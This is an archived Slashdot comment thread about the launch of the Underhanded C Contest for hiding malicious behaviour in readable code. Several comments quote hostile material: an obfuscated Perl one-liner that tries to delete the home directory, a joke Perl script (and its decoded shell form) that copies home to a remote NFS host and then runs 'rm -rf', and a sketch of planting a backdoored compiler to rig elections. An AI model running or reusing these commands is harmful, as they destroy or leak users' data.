Slashdot Mirror


The First Annual Underhanded C Contest

Xcott Craver writes "We have just announced a new annual contest, the Underhanded C Contest, to write clear, readable, innocent-looking C code that implements malicious behavior. The object is to hide evil functionality that survives visual inspection of the source. The prize is beer."

341 comments

  1. Comment removed by account_deleted · · Score: 5, Funny

    Comment removed based on user account deletion

  2. This will work by The+Original+Yama · · Score: 4, Funny

    People will do anything for beer! Who needs speech when you're gulping down a cold lager?

    1. Re:This will work by isny · · Score: 4, Funny

      Based on past experience, free beer is usually the first step toward free speech.

    2. Re:This will work by AnusesCheeses · · Score: 1, Insightful

      You mean like Hitler's infamous Beer Hall Putsch?

    3. Re:This will work by The+Original+Yama · · Score: 1, Offtopic

      Mod this man down for invoking Godwin's Law, but mod him up for incorporating it into a joke :)

    4. Re:This will work by Anonymous Coward · · Score: 1, Informative

      1. "Invoking" the law is what you do in response to a violation.

      2. You don't mod people down over Godwin's Law. You declare the argument over, and the person who tried to use Nazis or Hitler to vilify their opponent is the loser. There is no "-1, Godwin" mod category, nor should there be.

      3. You only mod jokes up as "Funny" or "Insightful" if they are, in fact, funny or insightful. Saying Free Beer doesn't lead to greater liberties because Hitler once gave some people free beer fails to either debunk the original point (which can still be true in other cases), and also fails to make anybody laugh.

      So no mod points should be used on his post, so people can save them to mod down both your post and mine as "Offtopic."

    5. Re:This will work by Anonymous Coward · · Score: 0

      -1, Pedantic

    6. Re:This will work by EvanED · · Score: 1, Offtopic

      You don't mod people down over Godwin's Law. You declare the argument over, and the person who tried to use Nazis or Hitler to vilify their opponent is the loser. There is no "-1, Godwin" mod category, nor should there be.

      Maybe there should be a (0, Godwin) moderation.

    7. Re:This will work by Anonymous Coward · · Score: 0

      If I write a program that can make me pass for age 21 or over, do I get to keep the beer?

    8. Re:This will work by Anonymous Coward · · Score: 0

      Hmm... maybe you're onto something. Tipping tea is the first step in starting a new free world.

    9. Re:This will work by mizhi · · Score: 1

      And the 20th free beer is getting close to the right to remain silent.

      --
      Humorless sig goes here.
    10. Re:This will work by Anonymous Coward · · Score: 0

      No, but there definitely needs to be a (-1, Formossa's Law) moderation.

    11. Re:This will work by hostyle · · Score: 2, Funny

      Moderation nazi!

      --
      Caesar si viveret, ad remum dareris.
    12. Re:This will work by jonadab · · Score: 1

      I think the other poster meant free speech as in loosened tongues, not political expression.

      --
      Cut that out, or I will ship you to Norilsk in a box.
  3. Seems a bit like those hacking contests by bcmm · · Score: 1

    If they can do something really malicious with innocent-looking C code, they might want to gain a bit more than beer in the course of revealing how they did it...

    --
    # cat /dev/mem | strings | grep -i llama
    Damn, my RAM is full of llamas.
    1. Re:Seems a bit like those hacking contests by numbski · · Score: 5, Informative
      This is worse than the people that go around obfuscated perl. At least then you KNOW they're trying to hide something. I mean, you remember this?
      perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{~" -;;s;;$_;see'
      Don't run that. :P Unless you really don't like your home directory. I remember someone tore it down and dissected it, but the point is that if you can "hide it in broad daylight", then it is far more dangerous. :)

      I mean I could do something like this:

      # When do you want it done?
      $today="sudo";
      $yesterday="su -c";

      # Define our globals
      $superman="ls";
      $wonderwoman="rm"
      $batman="cp";
      $aquaman="mv";

      #define some important flags
      $blows="-r";
      $maims="-p";
      $chunks="-f";
      $defeats="-s";

      #define some targets
      $your_mom="/";
      $your_dad="/usr";
      $your_sister="~";
      $your_teacher="/bin";
      $hell="/dev/null";
      $heaven="/dev/random";
      $skyhigh="nfs://myserver/myhome";

      #....later, back at Superfriends Headquarters

      `$batman $blows $your_sister $skyhigh`;
      `$wonderwoman $blows $chunks $on $your_sister`;
      `$today $batman $and $your_mom $think $heaven $is $a $great $place $for $your_sister`;
      #Would you like to see the rest of the story?
      #print "Would you like to hear more? Please type your password to continue!";

      The superfriends save the day again.
      --

      Karma: Chameleon (mostly due to the fact that you come and go).

    2. Re:Seems a bit like those hacking contests by surprise_audit · · Score: 1

      Might want to reveal it from the safety of another country, preferably one that doesn't allow extradition to the US...

    3. Re:Seems a bit like those hacking contests by Frank+T.+Lofaro+Jr. · · Score: 1

      I ran it from a test account I created to contain the damage.

      It tried to remove the home directory itself!

      Couldn't do it and it gave up without damaging any files.

      Only severely misconfigured UNIX systems allow deleting one's own home directory, because the directory above your home, which is what you need permission on, you don't have write (you don't have /home writable, right)?

      Nice as a proof of concept, but won't work anymore.

      --
      Just because it CAN be done, doesn't mean it should!
    4. Re:Seems a bit like those hacking contests by numbski · · Score: 1

      Yeah, I didn't test it. I was just tossing code down. I could have it wipe the contents but not the directory itself just as easily. :)

      --

      Karma: Chameleon (mostly due to the fact that you come and go).

    5. Re:Seems a bit like those hacking contests by grolschie · · Score: 1

      I really like your story and am waiting for the sequel, or perhaps the movie/DVD.

    6. Re:Seems a bit like those hacking contests by Aeiri · · Score: 1

      Here are the commands in plain text. All you have to do is copy and paste it to a new text file, add echo to the beginning of each line and BE SURE TO REMOVE THE "`"S!

      I also had to remove the "$"s... not sure what shell you are using but that doesn't work on Bash or ZSH...

      cp -r ~ nfs://myserver/myhome
      rm -r -f ~
      sudo cp / /dev/random ~


      Basically it copies your home directory to your shared stuff, then removes your home directory and copies all of /, mixed with as much random data it can spit out before you Ctrl+C it, to your home directory.

    7. Re:Seems a bit like those hacking contests by NnT042 · · Score: 1

      It wasn't a shell, it was Perl code, which lets you execute shell commands by `enclosing said command in backticks`. You don't need to know what command you're running ahead of time because of the `$nifty way $it interpolates your $variables` (or should that be my $variables ?)
      Not that I'm an expert in shells or anything, but last I looked, echo means "print this to stdout", which would do no executing and merely expose your evil scheme for the world to see. Where's the fun in that?

    8. Re:Seems a bit like those hacking contests by Runagate+Rampant · · Score: 1
      another country, preferably one that doesn't allow extradition to the US...

      What country is that? Is it one that wants to look like Afghanistan or Iraq?

    9. Re:Seems a bit like those hacking contests by Aeiri · · Score: 1

      last I looked, echo means "print this to stdout", which would do no executing and merely expose your evil scheme for the world to see.

      That was my point, exposing your evil scheme. I was talking to the other guy, who, in order to try and figure out what your commands were, ACTUALLY RAN THE CODE...

      He never really found out what it did that way, and I was just trying to show him what it does.

      PS: PERL, DUH, *smacks self in head*

      When I see some file starting out with nothing that looks like that, I assume Bash, for some reason. If it were Perl, I would expect a sha-bang explaining that...

    10. Re:Seems a bit like those hacking contests by Peristarkawan · · Score: 1

      Just FYI, both bash and tcsh do the same thing with backticks. There's no reason this couldn't be a shell script with only slightly modified syntax.

    11. Re:Seems a bit like those hacking contests by MCraigW · · Score: 1

      France.

    12. Re:Seems a bit like those hacking contests by cosminn · · Score: 1
      perl -e '$??s:;s:s;;$?::s;;=]=>%-{

      that is in the top 3 ugliest pieces of code I have ever seen :)

      Do you mind breaking it into pieces and explaining what's happening in there? I'd really like to understand it.

      Thanks,

      -Cos
  4. in other words... by beta-guy · · Score: 4, Funny

    kill the brain cells that made innocent looking malicious code :P

    1. Re:in other words... by grammar+fascist · · Score: 3, Insightful

      On a more serious note - they should rethink their prize. Not everyone drinks beer, and there are plenty of talented programmers who avoid it completely. In fact, the ones who do probably have more working brain cells to throw at the problem.

      Yes, I know that must come as a shock, and most people here probably won't believe me...yet it's true.

      (And just to head off the inevitable nutcase looking for a Score:5, Funny: no, replacing the prize with free pr0n isn't going to cut it. :p)

      --
      I got my Linux laptop at System76.
    2. Re:in other words... by crisco · · Score: 2, Funny

      Ah, but any other self respecting, non beer drinking programmer will recognize its value as currency among lesser mortals. Even simply passing the prize along to lesser mortals can induce acts of goodwill.

      --

      Bleh!

    3. Re:in other words... by wiml · · Score: 1

      Hey, some studies have shown that moderate (like, 1 drink a day) beer intake helps you grow new brain cells. Kinda like those other studies that show that moderate red wine drinking is good for your heart.

      (Still waiting for a study that shows that pr0n boosts immune function or something though.)

  5. There you programmers go again... by bennomatic · · Score: 1
    ...testing the limits of the first ammendment. And all for a beer!

    Seriously, though, this is (obviously) a lot like the obfuscated c contest, but it's a cool idea, in that there's an important lesson to learn about evaluating code.

    --
    The CB App. What's your 20?
    1. Re:There you programmers go again... by Anonymous Coward · · Score: 0

      from the article:

      "Inspired by Daniel Horn's Obfuscated V contest in the fall of 2004"

      hmmmm...

    2. Re:There you programmers go again... by Hex4def6 · · Score: 1

      "...testing the limits of the first ammendment. And all for a beer! "

      Are you seriously suggesting that this is stretching someone's first ammendment rights?

      This is not attacking / defaming / publishing state secrets etc. This is basically the equivalent of a riddle. If a technical (I assume) person thinks this is risky ground, I shudder to think what the average bob thinks...

    3. Re:There you programmers go again... by Three+Headed+Man · · Score: 1

      char V;
      V = C;

      They didn't want to code it as a character literal, in case they upgrade the language later.

      --
      I'm probably at the karma cap. Mod up a funny troll instead, it lightens the mood :)
    4. Re:There you programmers go again... by bennomatic · · Score: 2, Insightful

      No, not seriously. I was just reading an article on the Patriot Act, though, and was thinking about how the masses--the same ones who are willing to accept that using BitTorrent is equivalent to terrorism--might see this sort of endeavor.

      --
      The CB App. What's your 20?
    5. Re:There you programmers go again... by Anonymous Coward · · Score: 0

      > ...Are you seriously suggesting that this is stretching someone's first ammendment rights?

      --

      Yep. Most other people have amendment rights,
      this one has stretched an extra character.

  6. What are the legal ramifications of this? by CyricZ · · Score: 0, Troll

    This sounds a lot like possible entrapment. The authorities start a contest such as this, an unsuspecting programmer submits a malicious program, and he or she is arrested and charged with a variety of computer crimes. Frankly, I won't participate in this contest considering the current legal state of America.

    --
    Cyric Zndovzny at your service.
    1. Re:What are the legal ramifications of this? by Anonymous Coward · · Score: 3, Funny

      Pussy.

    2. Re:What are the legal ramifications of this? by spellraiser · · Score: 2, Informative

      RTFA, please.

      The challenge for the first UCC is to write a simple program that performs some basic image-processing operation, for example smoothing or resampling, but manages to conceal a unique imperceptible fingerprint in each image it opens.

      The fingerprint should be different for every execution of the program. It doesn't have to have any particular meaning, but useful tracking information is worth extra points (tho getting caught is worth fewer points.) The print should be extractable from the output image by another program. Realistically, the detector will not have access to the original image for comparison purposes.

      I seriously doubt that anyone could get arrested for writing something like this, dubious legal state or not.

      --
      I hear there's rumors on the Slashdots
    3. Re:What are the legal ramifications of this? by Neoprofin · · Score: 0

      However the winning entry will be taken by the government and inserted secretly by a crack team of hackers into every image editing program on the market. 1984 is here!

    4. Re:What are the legal ramifications of this? by Cryptacool · · Score: 2

      What?

      Are you serious? Entrapment is an undercover cop asking you if you want to buy drugs, then when you say no, he tries to persuade you and succeeds, possibly because you just want him to go away.

      It's really not that easy for something to qualify as entrapment, also consider that writing malicious code isn't illegal, it's free speech and no different than writing a book that urges people to do something malicious, not at all illegal.

      But no please, keep thinking everything is illegal and don't bother doing anything it makes it easier to actually make it illegal.

    5. Re:What are the legal ramifications of this? by anthony_dipierro · · Score: 4, Insightful

      The authorities start a contest such as this, an unsuspecting programmer submits a malicious program, and he or she is arrested and charged with a variety of computer crimes.

      What computer crimes would be broken?

      Frankly, I won't participate in this contest considering the current legal state of America.

      No, you won't participate because of your current state of paranoia over the legal state of America.

    6. Re:What are the legal ramifications of this? by bighoov · · Score: 5, Funny

      Can you even breathe in that tinfoil cocoon?

    7. Re:What are the legal ramifications of this? by Ectospheno · · Score: 1

      Why was the parent post marked troll? I'd say this is a clear case of moderator abuse.

    8. Re:What are the legal ramifications of this? by Anonymous Coward · · Score: 0

      I think it's more likely you won't participate in the contest because you don't have the coding skills. That and the fact that generally to take part in a competition you would have to read the rules, which you obviously didn't take the 2 seconds to do as other replies to your troll already pointed out.

    9. Re:What are the legal ramifications of this? by drxenos · · Score: 1

      Actually, his asking is enough grounds for entrapment. The person the cop is talking to must be the one to bring up the subject of buying drugs or else in the US it is considered entrapment.

      --


      Anonymous Cowards suck.
    10. Re:What are the legal ramifications of this? by drxenos · · Score: 1

      Get yourself a legal dictionary and look up "entrapment."

      --


      Anonymous Cowards suck.
    11. Re:What are the legal ramifications of this? by Anonymous Coward · · Score: 0

      If that were the case, then I should be arrested for every programming project I did in my college c programming classes.

      It did good stuff, it did a lot of bad stuff too.

    12. Re:What are the legal ramifications of this? by Genrou · · Score: 2, Interesting

      Not the same paranoia of the previous post, but paranoia anyway. But the first thing that I thought was something like: "oh, so, this contest will show that malicious code can be inserted in open source and it will be very difficult to spot?" -- there are at least one software company that will like to point to it. Then again, I might actually be paranoid.

    13. Re:What are the legal ramifications of this? by Anonymous Coward · · Score: 0

      No... the weight of my body tears it open when I pass out

    14. Re:What are the legal ramifications of this? by patio11 · · Score: 1

      What he said. You're familiar with the term "entrapment", right? You can't be prosecuted for behavior the government solicits from you -- that's why they walk on eggshells in drug/prostitution cases.

  7. Beer by tehshen · · Score: 1

    I'm interested to know how the beer will be transported. In an airtight container smuggled through check-in? Frozen (planes get pretty cold you know)? Or will they just send money for us to buy beer with?

    --
    Guy asked me for a quarter for a cup of coffee. So I bit him.
    1. Re:Beer by Anonymous Coward · · Score: 0

      The outside of planes do become quite cold, however the cabin and luggage compartments are insulated and kept at a reasonable temperature.

    2. Re:Beer by Ki+Master+George · · Score: 1

      RTFA - They're sending some of their local beer.

      --
      Before you walk a mile in someone's shoes, you should insult them so you know how they are and what they're doing.
    3. Re:Beer by Anonymous Coward · · Score: 0

      Maybe they'd ship it on the ground like most beer, dumb ass. You think they need some James Bond shit to send beer around? Smuggled? What, are you from Iran???

    4. Re:Beer by Anonymous Coward · · Score: 0

      Oh, God! Not Corona!

    5. Re:Beer by spauldo · · Score: 2, Interesting

      They used to use the back section of planes to make ice cream (the cold and vibration from the propeller planes was perfect for it). It was air force tradition for quite some time.

      It really just depends on what kind of plane you're talking about. I'm sure there's areas on even modern large-body jets where there's an uninsulated section large enough for a keg.

      --
      Those who can't do, teach. Those who can't teach either, do tech support.
    6. Re:Beer by MCraigW · · Score: 1

      No, Coors Lite.

  8. Do these count? by Anonymous Coward · · Score: 0

    Do poorly written C projects with innocuous looking, yet malicious code count?

  9. Re:The prize is beer... by Anonymous Coward · · Score: 0

    Is it free as in beer?

  10. Beer? Phui! by devross · · Score: 2, Funny

    The object is to hide evil functionality that survives visual inspection of the source.

    The prize is world domination!

    --


    If these walls could talk they'd probly still ignore me. --MF DOOM
  11. It's a bad idea by Anonymous Coward · · Score: 3, Interesting

    Count on the likes of Sun, Microsoft, and anyone else selling a non-C language to pounce on this as a marketing opportunity.

    C is a superb language. Why besmirch its reputation with a contest to make it seem as untrustworthy as possible?

    1. Re:It's a bad idea by Catamaran · · Score: 4, Insightful
      C gives you just enough rope to hang yourself.

      Java gives you a polished floor on which you can slip and break your neck.

      C++ gives you a thermo-nuclear device.

      --
      Test 1 2 3 4
    2. Re:It's a bad idea by Anonymous Coward · · Score: 0
      I decided that +1 Fucking Ignorant was more likely


      Hey, moderation should apply to the comment being moderated, not to the moderator!

    3. Re:It's a bad idea by Anonymous Coward · · Score: 0
      C is a superb language.
      Nice troll.
    4. Re:It's a bad idea by Tim+C · · Score: 1

      Reminds me of a quote I read once (it's almost certainly a fortune):

      In C it's easy to shoot yourself in the foot. C++ makes it harder, but when you do, you take your whole foot off

      Or somesuch.

    5. Re:It's a bad idea by xYoni69x · · Score: 1

      Yes, Bjarne Stroustrup (the "father" of C++) really did say that.
      Google finds many other derived jokes.

      --
      void*x=(*((void*(*)())&(x=(void*)0xfdeb58)))();
    6. Re:It's a bad idea by Acid-Duck · · Score: 0

      You don't get it, the whole point is to see how creative people can be.

      Erik

    7. Re:It's a bad idea by Anonymous Coward · · Score: 0

      No I did get it. Simply I was pointing out the unwisdom of such a move given the opportunistic nature of some of the better-funded marketing departments out there.

    8. Re:It's a bad idea by dcam · · Score: 3, Funny

      You accidentally create a dozen instances of yourself and shoot them all in the foot. Providing emergency medical assistance is impossible since you can't tell which are bitwise copies and which are just pointing at others and saying "That's me, over there."

      Source

      --
      meh
    9. Re:It's a bad idea by Anonymous Coward · · Score: 0

      Despite your moderation down by some C fanboy, I would like to chip in and agree - when I didn't have many other languages under my belt, I thought C was superb too.

    10. Re:It's a bad idea by Billy+Donahue · · Score: 1


      yo-toh! yo-toh!

      --
      -- The Funk, The Whole Funk, And Nothing But The Funk
    11. Re:It's a bad idea by Anonymous Coward · · Score: 0

      ...and Assembly gives you the keys to the Death Star.

    12. Re:It's a bad idea by hitman200ca · · Score: 1

      C++ gives you a thermo-nuclear device.

      With a big red button labelled "Fun!" and no instructions.

    13. Re:It's a bad idea by jonadab · · Score: 1

      > C gives you just enough rope to hang yourself.
      > Java gives you a polished floor on which you can slip and break your neck.

      I can go along with these.

      > C++ gives you a thermo-nuclear device.

      I think it's more like razorwire -- even better for hanging yourself than C's plain old rope, since you can easily lacerate your hands in the process.

      Of course, my language of choice has frequently been called a Swiss Army chainsaw, and it doesn't require a lot of imagination to think of ways to hurt yourself with that. I think Perl6 is supposed to be more like a multiblade Swiss Army butterfly-action light sabre, or something. (The ability to dork significantly with the language's grammar seems particularly powerful, i.e., particularly dangerous...)

      --
      Cut that out, or I will ship you to Norilsk in a box.
    14. Re:It's a bad idea by leuk_he · · Score: 1

      Java gives you a polished floor on which you can slip and break your neck.

      No problem there. You just let the garbage collector sort it out.

  12. If crashing is "malicious behavior" by frenchgates · · Score: 1

    doesn't that make basically all c code underhanded?

    --
    Syntax error: loose != lose, affect != effect, then!=than
    1. Re:If crashing is "malicious behavior" by Anonymous Coward · · Score: 0

      No. Dumbass.

    2. Re:If crashing is "malicious behavior" by geoffspear · · Score: 1

      Maybe all C code you write. Some people can actually design their code properly.

      --
      Don't blame me; I'm never given mod points.
    3. Re:If crashing is "malicious behavior" by gstoddart · · Score: 1
      doesn't that make basically all c code underhanded?

      Hmmm .... you realize C forms the basis for a great deal of modern operating systems don't you?

      There are more lines of non-crashing, non-malicious, well-designed, and well-tested lines of C out there than most other programming languages.

      --
      Lost at C:>. Found at C.
    4. Re:If crashing is "malicious behavior" by proverbialcow · · Score: 2, Funny

      doesn't that make basically all c code underhanded?

      Nope. Only the code that includes

      #include <windows.h>

      *ducks*

      --
      The only surefire protection against Microsoft infections is abstinence. - The Onion
  13. How will the judges be able to trust this code? by bcmm · · Score: 1

    If the contestants can really hide malicious code, then will the judges get code that does something innocent, something concealed to win the prize, and something else to mess up the judge's files a bit?

    --
    # cat /dev/mem | strings | grep -i llama
    Damn, my RAM is full of llamas.
    1. Re:How will the judges be able to trust this code? by thebatlab · · Score: 1

      I'm sure they'll run these directly on their home machine with all their important documents :)

  14. I think I might win by numbware · · Score: 4, Funny

    #include
    main()
    {
    printf("Hello World");
    }

    Seemingly harmless, right? Wrong. It's still in development, but think about it. You should have to greet the world before you destroy it. :)

    --
    I'm going to go create my own technology news site, with blackjack and hookers. You know what? Forget the news site.
    1. Re:I think I might win by numbware · · Score: 1

      there should be an 'stdio.h' after the #include, obviously (thank you slashdot filtering)

      --
      I'm going to go create my own technology news site, with blackjack and hookers. You know what? Forget the news site.
    2. Re:I think I might win by LiquidCoooled · · Score: 1

      It depends which file you include to map printf...

      --
      liqbase :: faster than paper
    3. Re:I think I might win by Anonymous Coward · · Score: 0

      That's okay, the program breaks other rules anyway...

    4. Re:I think I might win by saskboy · · Score: 1

      I was thinking you were including some library with the bad code, and the rest was just a smokescreen.

      --
      Saskboy's blog is good. 9 out of 10 dentists agree.
    5. Re:I think I might win by Genrou · · Score: 1

      You might win, but you should change your code to

      #include
      main()
      {
      printf("How are you gentleman. \n All your base are belong to us.");
      }

  15. This year's challenge by ErichTheWebGuy · · Score: 1

    Covert fingerprinting. In other words, hiding information inside an image file. hmm... Any open-source steganography programs to use as a starting point?

    --
    bash: rtfm: command not found
    1. Re: This year's challenge by ErichTheWebGuy · · Score: 4, Informative

      Any open-source steganography programs

      Why, yes! http://sourceforge.net/projects/steghide/

      --
      bash: rtfm: command not found
    2. Re: This year's challenge by l3v1 · · Score: 1

      it won't do much good since their [stegano] goal is not to hide their behaviour from visual inspection of the code... Seek further.

      --
      I am putting myself to the fullest possible use, which is all I can think that any conscious entity can ever hope to do.
    3. Re: This year's challenge by ErichTheWebGuy · · Score: 1

      Of course it would. After learning how the stego program works, your only remaining task is to figure out how to hide it. You no longer have to figure out how to hide the data. Seek further you need not.

      --
      bash: rtfm: command not found
    4. Re: This year's challenge by agraupe · · Score: 1
      Seek further you need not.

      Well, if you're Yoda, then you can just use the Force to do it.

  16. Indeed. This could be a field day for Java and C#. by CyricZ · · Score: 0

    Everyone knows that it is possible to write malicious code in C. That's just because C gives you the near utmost control over your system, and does not discriminate based on human emotions like "good", "bad", and "malicious". Perhaps a better idea would have been to try to write malicious code in a language such as Java, which tries to prevent a programmer from writing such code. That would be a real challenge.

    --
    Cyric Zndovzny at your service.
  17. my submission by selderrr · · Score: 1

    although probably modded funny, the code below will most often just work !

    {
    printf ("hi, this is your bank. really. Look at the logo at the top. Trust me. I'm your bank. Now enter your VISA number and any personal information you can come up with. Maybe you'll win a pony");
    scanf("%s", &visanumberbuffer); // duh... buffer overrun anyone :-)
    }

  18. Is it... by Anonymous Coward · · Score: 0

    Free as in beer?

  19. Strange by macemoneta · · Score: 1

    This sounds like someone is asking for a DRM/watermarking-type of application, that would survive open source inspection. Hmmm.

    --

    Can You Say Linux? I Knew That You Could.

  20. like this? by LiquidCoooled · · Score: 5, Funny

    #include stuff.h
    void main()
    {
    /* nothing / */ /* to see / * here */
    /* whats * / challenging / * about */
    /* this */ /* there / is no */ evil /*
    screensaver(); * function */ /* here
    anyone that thinks there is * / needs */
    /* their / * / eyes testing */ ();
    }

    585

    --
    liqbase :: faster than paper
    1. Re:like this? by alexhs · · Score: 1
      >#include stuff.h
      >void main()
      >{
      > /* nothing / */ /* to see / * here */
      > /* whats * / challenging / * about */
      > /* this */ /* there / is no */ evil /*
      > screensaver(); * function */ /* here
      > anyone that thinks there is * / needs */
      > /* their / * / eyes testing */ ();
      >}
      >
      >585
      I'm hesitating between a harmless evil(); function and an evil whitespace function (and I ruined it copypasting).
      --
      I have discovered a truly marvelous proof of killer sig, which this margin is too narrow to contain.
    2. Re:like this? by truedfx · · Score: 1

      Extra points if your code looks innocent under syntax coloring;

      You wouldn't stand a chance :)

    3. Re:like this? by Dun+Malg · · Score: 4, Funny

      Nice idea, but it doesn't look innocuous. It looks like a trick. I think the contest is for code the equivalent of a razor blade in a nice looking apple, rather than a razor blade hidden in a pile of clearly marked rat poison.

      --
      If a job's not worth doing, it's not worth doing right.
    4. Re:like this? by Anonymous Coward · · Score: 0

      One of the rules is that you need to write it in C. I have no idea what language you're writing in but it's not C. I can count three errors without even trying. I'm confident there are more.

    5. Re:like this? by Anonymous Coward · · Score: 0

      Think about it... nobody would expect it!

    6. Re:like this? by Dun+Malg · · Score: 1
      Think about it... nobody would expect it!

      errr....expect it or not, anyone seeing a suspicious pile of comments like that is gonna delete it all before compiling. After all, they're just comments.

      --
      If a job's not worth doing, it's not worth doing right.
    7. Re:like this? by Peristarkawan · · Score: 1

      So you put the evil function call in plain sight later on in the source, and in the entangled evil-looking comments you hide the code that disables it.

  21. Re:Indeed. This could be a field day for Java and by bcmm · · Score: 2, Informative

    RTFA. The idea is to hide the malicious functions so that the source code looks innocent.

    --
    # cat /dev/mem | strings | grep -i llama
    Damn, my RAM is full of llamas.
  22. how appropriate by circusboy · · Score: 1

    this is the /. fortune cookie at the moment that I read this story...

    If you can't learn to do it well, learn to enjoy doing it badly.

    assuming you read this with a different meaning of 'badly' in mind...

    --
    -- it's ridiculous how many people misspell ridiculous... (damn, damn, damn...)
  23. easy by larry+bagina · · Score: 1

    #include "/dev/console"

    --
    Do you even lift?

    These aren't the 'roids you're looking for.

    1. Re:easy by Anonymous Coward · · Score: 0

      on windows do this:

      #include "con"

    2. Re:easy by ICA · · Score: 1

      Prove it. I just built it and it runs fine.

  24. The judges will expect that by MarkByers · · Score: 1

    The judges will obviously be expecting programs that try to delete files or modify them, so they will without a doubt create a separate environment to run the malicious programs in. Probably they will restore the machine to a known clean state after every run.

    If they didn't do this, you can bet that someone would try to write a program which would detect competitors' programs running and disable them.

    --
    I'll probably be modded down for this...
  25. Re:Indeed. This could be a field day for Java and by CyricZ · · Score: 1, Insightful

    And like I said, do it in Java instead. That'll make it a real challenge, since the designers of Java made an effort to make it difficult to write malicious code in the first place. The point isn't that the code will look valid, but rather that it will perform malicious duties, which is something that is a challenge in Java, but easily done in C. Making it look valid is just an additional challenge for both languages.

    --
    Cyric Zndovzny at your service.
  26. Attack the Compiler by LionKimbro · · Score: 4, Interesting

    Why attack the source code when you can instead attack the compiler?

    You need only attack the compiler, or the linker, or the interpreter.

    1. Re:Attack the Compiler by lawpoop · · Score: 1

      But would such an attack survive a 3rd party human audit of the source code?

      --
      Computers are useless. They can only give you answers.
      -- Pablo Picasso
    2. Re:Attack the Compiler by derek_farn · · Score: 2, Informative

      For all you could possibly want to know about C, and more, check out this book (8M pdf). Those who want pure, uncommentaried, standard words can find them here.

    3. Re:Attack the Compiler by DrSkwid · · Score: 1

      the whole point is "yes" RTFP

      --
      There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
    4. Re:Attack the Compiler by Anonymous Coward · · Score: 0
      Uh, you didn't read the article, did you. The paper was a 1987 paper in which Ken Thompson described an attack that survives _ALL_ source code audits because the attacked compiler (or linker or loader) itself injects the malicious code.

      Note that even auditing the compiler source itself doesn't help, if the compiler is itself compiled by a compromised compiler.

    5. Re:Attack the Compiler by yupa · · Score: 1

      No attack the cpu microcode and update it!!!

    6. Re:Attack the Compiler by yppiz · · Score: 1

      Bury the evilness in the make file. No one will find it there.

      --Pat

    7. Re:Attack the Compiler by dvdeug · · Score: 1

      Why attack the source code when you can instead attack the compiler?

      Because I'm not going to download my compiler from a random site on the net, but I may download image processing code from a random site on the net.

    8. Re:Attack the Compiler by bit01 · · Score: 1

      Bury the evilness in the make file. No one will find it there.

      Bury it in the configure script. There's so much magic in there, and cross platform stuff that no one person is likely to know about, you could hide an elephant.

      ---

      Repetitive advertising is noise and compromises free speech.

    9. Re:Attack the Compiler by LionKimbro · · Score: 1

      I have never met a single programmer that understood configure scripts.

      Of all the programmers I know who have understood configure scripts, they have all told me: "Oh, I just took someone else's configure script, and modified it a little. But I don't understand it."

    10. Re:Attack the Compiler by LionKimbro · · Score: 2, Insightful

      Yes, quite right.

      I guess the thing is: What we're really concerned about here, (if I may project a little,) is voting software.

      In those cases, they're probably not going to say, "download the compiler from a random site on the net." In fact, it's probably going to be very hard to control the people who compile the software, and even harder to control the people who compile the compiler. At some point, somebody's going to get the compiler, and they're going to get it from some specified place.

      If it's a secret place, then the vote is determined by whoever controls that secret place. If it's a public place, well- that's something to think about.

      Maybe we should have a Federal list of 100 places to get the compiler from. Or a thousand places. However it is done, we want to make it more expensive to buy the vote than the vote is worth.

    11. Re:Attack the Compiler by lachlan76 · · Score: 1

      But...don't you use autoconf to make it?? That's what I do, and what I thought everyone else did.

      That said no-one knows how it works. It's machine generated with macros, what can you expect?

    12. Re:Attack the Compiler by brianosaurus · · Score: 1

      It's a big what if scenario...

      If the evil() code is innocuous looking, someone could slip it in as part of a major bug-fix patch. Or maybe ease it into the code over time. Or sneak it in as part of a port to the C-64. Or maybe use some other back-door to install it on the maintainer's source repository. There's all sorts of ways they could do it, if the happy, smiling, blood-sucking code can be created in the first place.

      A few versions later, it reaches the main branch. No one found it because it was hiding really well, and no one is specifically looking for it, because it looks like normal, well-structured, i'm not totally sure what its doing, but it doesn't really look too complicated, and i don't want to seem like an idiot in my first week, clean-compiling code. Then it goes on all of those 100 approved download places.

      A few versions later, there have been enough major upgrades, and sufficient debugging that most installations will have been upgraded at least once. The author merely has to wait as long as needed to get to a critical mass of zombies-in-waiting. Then BOOM!

      How do you find things that the most scrutinizing examiners missed, particularly when you don't know what you're looking for?

      How does a software company with only a few programmers or maybe only a few tens of thousands to examine all the code while at the same time developing it on a tight schedule, double-check something that was deliberately obscured to pass the coding standards of the corporation?

      --
      blog
    13. Re:Attack the Compiler by LionKimbro · · Score: 1

      I think I can think of easier ways.

      Imagine that you have a million dollars to spend buying a vote in a key state. You can afford to buy some spies, full-time programmers, all sorts of stuff, with this much money.

      Now you figure out where the code is being compiled. You do this with your plants in the process. You spend all your time figuring out: Where will they get the source code from. Where will they compile it. Where do they copy from. Etc., etc.,. Learn how that process works.

      Now you have a way to find out where the compiler will come from. If some "Jim" somewhere is the person who will be compiling the code, figure out what processes will likely be followed by Jim. Is he going to get his compiler off of his own personal computer? Is he going to get a compiler from his work computer? Is he going to download a compiler fresh, and compile it himself? (If so, which compiler is he going to use to compile the compiler?) This is just detective work, and there are people you can pay to do it.

      Now you have the source of the compiler. You pay a sympathetic programmer to analyze the public source code, and to build a bug into the compiler.

      You don't worry about submitting an official commit. Rather, you make sure that you can hack into the compiler distribution site on the day that you need to put the code in. If Jim is going to compile it himself, the job is even easier: You only need to sneak in at night, replace his gcc with your bugged gcc, and then when he compiles the compiler with his bugged gcc, it will similarly infect the newly compiled gcc. Then when he downloads the squeaky clean publicly-approved source code, it will bug the output.

      Really, this is very very simple. The only major costs are, I think, 6 months to develop and test the code, and the costs involved in spying, hacking, and deployment. None of these tasks are mysterious, and the working knowledge to do it is readily available. All you need is X dollars, and you can steal an election in this way.

      The publicly visible source code is a sleight of hand. The entire public watches the source code. "The source code is clean, the source code is public, we won the public source code, we know it's good because the source code is clean." You'll have armies of people studying, documenting, talking about, celebrating the source code.

      That's all in the right hand.

      In the left hand, you've got the compiler. Nobody cares about the compiler. Nobody talks about the compiler. Nobody thinks about the compiler.

      It's way too easy.

      Are people motivated to steal elections? You better believe it. Do people have the money to steal elections? You better believe that, too.

      Using computers to count elections is the most dangerous way to do elections. We can use computers to good effect in elections, but it's not the way we think. Here's how to put computers to good use: Constantly recording count efforts.

